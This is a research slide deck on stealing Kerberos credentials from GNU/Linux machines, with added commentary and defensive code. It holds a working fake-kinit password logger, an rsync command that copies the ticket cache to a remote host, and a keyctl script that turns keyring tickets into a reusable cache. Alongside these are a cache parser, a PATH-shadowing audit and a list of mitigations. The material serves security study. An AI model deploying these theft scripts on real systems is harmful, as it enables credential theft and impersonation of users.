Kerberos Credential Thievery (GNU/Linux) · 2018. 7. 19. · (GNU/Linux) Ronan Loftus, Arne Zismer...
Kerberos Credential Thievery
(GNU/Linux)
Ronan Loftus, Arne Zismer
July 3, 2017
Context
Kerberos I
• Authentication protocol
• Reduce amount of sensitive credentials sent over the network
• Commonly used in Linux networks (e.g. Hadoop)
Research Question
Can Kerberos credentials be stolen from GNU/Linux machines?
Related Work
• Sniffing and replaying Kerberos credentials on the network [1]
• Extracting Kerberos credentials from Windows machines with Mimikatz [2]
Approach
Kerberos II
Figure 1: Kerberos protocol
Figure 5: Our test setup
• Tickets are stored in credential caches:
  • File
  • Keyring
  • Memory
Attacks
Credential Cache (File)
Figure 6: Structure of a credential cache
Keylogging I
• Targeted keylogger
• Path manipulation
Keylogging II
```python
from getpass import getpass
from sys import argv
from pexpect import spawn

# The wrapper from the slide: a fake "kinit" placed earlier in PATH than
# /usr/bin/kinit. It forwards the real prompt to the user, passes the
# password on to the real binary so the login still succeeds, and keeps
# a copy of the password in creds.txt.
if __name__ == '__main__':
    krbuser = argv[1]
    child = spawn('/usr/bin/kinit {}'.format(krbuser))
    prompt = child.read_nonblocking(1024).decode('utf-8')
    password = getpass(prompt)
    child.sendline(password)
    with open("creds.txt", "w") as f:
        f.write(password)
```
File Copying
• Default credential storage
• Contains all relevant authentication information
rsync /tmp/krb5cc_$(id -u) [email protected]:
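The file cache that the rsync line copies is a plain, unencrypted structure (Figure 6), so a defender can inventory exactly what a stolen copy carries. The reader below is an added example, not the authors' tool: it parses MIT krb5 file ccache format version 4 (the big-endian layout current kinit writes) and runs over a constructed sample cache for a made-up principal alice@EXAMPLE.COM; pointed at /tmp/krb5cc_$(id -u) it lists every ticket in the file with its expiry and renewal horizon.

```python
import struct

# Reader for the MIT krb5 file credential cache, format version 4 (big-endian fields).
# Added illustration code, not the slides' tool; the sample cache at the bottom is constructed.
class _Reader:
    def __init__(self, buf): self.buf, self.pos = buf, 0
    def u(self, fmt):                       # unpack one field and advance
        (v,) = struct.unpack_from(fmt, self.buf, self.pos)
        self.pos += struct.calcsize(fmt)
        return v
    def data(self, n=None):                 # uint32 length-prefixed byte string
        n = self.u(">I") if n is None else n
        v = self.buf[self.pos:self.pos + n]
        self.pos += n
        return v
    def principal(self):                    # name_type, n_components, realm, components
        self.u(">i"); n = self.u(">i"); realm = self.data().decode()
        return "/".join(self.data().decode() for _ in range(n)) + "@" + realm

def parse_ccache(buf):                      # -> (default principal, [credential dicts])
    if buf[:2] != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled")
    r = _Reader(buf); r.pos = 2
    r.data(r.u(">H"))                       # header tags (KDC time offset); skipped
    default_principal = r.principal()
    creds = []
    while r.pos < len(buf):
        client, server = r.principal(), r.principal()
        enctype = r.u(">H"); r.data()       # session key: enctype + key bytes
        authtime, starttime, endtime, renew_till = (r.u(">i") for _ in range(4))
        r.u(">B"); flags = r.u(">I")        # is_skey, ticket flags
        for _ in range(r.u(">I")): r.u(">H"); r.data()   # addresses
        for _ in range(r.u(">I")): r.u(">H"); r.data()   # authdata
        ticket, _second_ticket = r.data(), r.data()
        creds.append({"client": client, "server": server, "enctype": enctype,
                      "start": starttime, "end": endtime, "renew_till": renew_till,
                      "flags": flags, "ticket_len": len(ticket)})
    return default_principal, creds

def _principal(realm, components, name_type=1):   # encoder used only to build the sample
    out = struct.pack(">iii", name_type, len(components), len(realm)) + realm
    return out + b"".join(struct.pack(">i", len(c)) + c for c in components)
def _cred(client, server, end, ticket):           # one constructed credential entry
    b = client + server + struct.pack(">HI", 18, 4) + b"\0" * 4      # aes256 enctype, dummy key
    b += struct.pack(">iiiiBI", end - 36000, end - 36000, end, end + 7 * 86400, 0, 0x40E10000)
    return b + struct.pack(">II", 0, 0) + struct.pack(">I", len(ticket)) + ticket + b"\0\0\0\0"
ALICE = _principal(b"EXAMPLE.COM", [b"alice"])
TGT = _principal(b"EXAMPLE.COM", [b"krbtgt", b"EXAMPLE.COM"], name_type=2)
SAMPLE_CCACHE = (b"\x05\x04" + struct.pack(">HHHii", 12, 1, 8, 0, 0)    # header: time-offset tag
                 + ALICE + _cred(ALICE, TGT, 1_700_036_000, b"\x61" * 16))
```

Real caches also contain configuration entries whose server principal starts with krb5_ccache_conf_data; they parse as ordinary credentials and can be filtered by name.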
Query Kernel Keyring I
What is a keyring?
What is keyctl?
1. Find the right keyring
2. Dump the credential fragments
3. Rebuild them as file
4. ???
5. Profit
Query Kernel Keyring II
```bash
#!/bin/bash
# The slide's script with comments added: rebuild a file-format ccache from the
# key entries of a KEYRING ccache. "u_name" is the ccache name placeholder used on
# the slide; ccache_header_data is a pre-built file holding the ccache header bytes.

keyring_name="u_name"
# Collection keyring "_krb_<name>" lives in the session keyring (@s); the ccache keyring sits inside it
krb_keyring=$(keyctl search @s "keyring" "_krb_${keyring_name}" 0)
keyring=$(keyctl search ${krb_keyring} "keyring" "${keyring_name}" 0)
key_components=( $(keyctl rlist ${keyring}) )

tmp_dir=$(mktemp -d)
for i in ${!key_components[@]}; do
    # The last ';'-separated field of rdescribe is the key description (the server principal).
    # A '/' in it (krbtgt/REALM@REALM) would otherwise be taken as a path separator.
    SPN="$(keyctl rdescribe ${key_components[${i}]} | rev | cut -d';' -f1 | rev | tr '/' '_')"
    keyctl pipe "${key_components[${i}]}" > "${tmp_dir}/${SPN}.bin"
done

cat ccache_header_data > krb5cc_$(id -u)
cat ${tmp_dir}/__krb5_princ__.bin >> krb5cc_$(id -u)
find ${tmp_dir} -name "*krbtgt*" -exec cat {} \; >> krb5cc_$(id -u)
rm -rf ${tmp_dir}
```
Dumping Process Memory
1. Create process containing ticket
2. Dump its memory
3. Find the encrypted blocks
4. Extract them
5. Transplant them into a file
Demo
Praise be to Cthulhu!
Wrapping Up
Conclusion
Password: X
File Ticket: X
Keyring Ticket: X
Process Ticket: X
Tickets can be stolen :(
Mitigations
Password: Absolute path, secure path
File Ticket: Don’t use it!
Keyring Ticket: Choose the shortest-lived keyring
Process Ticket: RAM encryption?
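The "absolute path, secure path" mitigation can be checked rather than assumed. The Python below is an added example, not from the presentation: it walks PATH in the order a shell would, reports which directory supplies kinit first, whether that directory is a trusted vendor directory and whether others can write to it, and flags the case where an untrusted copy shadows the trusted one. demo() builds a constructed two-directory scenario in a temporary directory; the trusted directory it passes is an assumption for the demonstration, and on a real host it would be /usr/bin.

```python
import os
import stat
import tempfile

TRUSTED = ("/usr/bin", "/usr/sbin", "/bin", "/sbin")   # assumed vendor-owned directories

def audit_command(cmd, path=None, trusted=TRUSTED):
    """Walk PATH in shell order and report every directory that supplies `cmd`.
    The first hit is what an unqualified `kinit` would run; if it is not in a
    trusted directory while a trusted copy sits later in PATH, it is shadowed."""
    path = os.environ.get("PATH", "") if path is None else path
    trusted_real = {os.path.realpath(t) for t in trusted}
    hits = []
    for d in path.split(os.pathsep):
        f = os.path.join(d, cmd)
        if not (os.path.isfile(f) and os.access(f, os.X_OK)):
            continue
        st = os.stat(d)
        hits.append({
            "path": f,
            "trusted": os.path.realpath(d) in trusted_real,
            "dir_owner_uid": st.st_uid,                      # 0 expected for vendor dirs
            "dir_writable_by_others": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
        })
    first = hits[0] if hits else None
    shadowed = first is not None and not first["trusted"] and any(h["trusted"] for h in hits[1:])
    return {"resolved": first["path"] if first else None, "shadowed": shadowed, "hits": hits}

def demo():
    """Constructed scenario, not a real host: a user-owned directory placed ahead of
    the vendor directory, each holding an executable named kinit (stand-in scripts)."""
    with tempfile.TemporaryDirectory() as root:
        vendor, userbin = os.path.join(root, "vendor"), os.path.join(root, "userbin")
        for d in (vendor, userbin):
            os.mkdir(d)
            f = os.path.join(d, "kinit")
            with open(f, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")           # placeholder, never executed
            os.chmod(f, 0o755)
        return audit_command("kinit", os.pathsep.join([userbin, vendor]), trusted=(vendor,))
```

Calling audit_command("kinit") with no path argument audits the current environment; a non-empty "shadowed" result or a non-root-owned first hit is the condition the keylogging slide relies on.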
Extensions
• Automate acquisition of tickets from process memory
• Extend to every keyring type
Questions?
References
[1] Emmanuel Bouillon. Taming the beast: Assess Kerberos-protected networks, 2009.
[2] Benjamin Delpy. Mimikatz. https://github.com/gentilkiwi/mimikatz, 2014.